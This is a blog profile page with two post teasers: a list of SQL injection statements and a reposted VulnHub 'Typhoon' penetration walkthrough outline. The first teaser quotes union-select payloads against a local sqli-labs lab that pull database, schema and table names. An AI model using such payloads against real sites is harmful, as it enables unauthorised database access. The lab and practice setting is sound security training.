- 博客(2)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 sql注入语句大全
http://127.0.0.1/Less-2/?id=-1 union select 1,database(),2231 %23//查询当前数据库union select 1,group_concat(schema_name),3 from information_schema.schemata %23 http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),2231 from information_schema.t
2021-02-08 15:17:45
1034
1
转载 靶机渗透之Typhoon实战
本次的Typhoon靶机包含了几个漏洞和配置错误。你们可以用这个靶机来测试网络服务漏洞,配置错误,web应用漏洞,也可以进行密码破解攻击,提权,后渗透,还可以进行信息收集和DNS攻击。 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 渗透测试方法 · 网络扫描(Netdiscover和Nmap都行) · 方法一:利用MongoDB进行入侵 · 查看robots.txt · 通过浏览器利用MongoDB · 获取凭证 · SSH登录 · 查看内核版本
2021-02-08 15:12:28
819
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人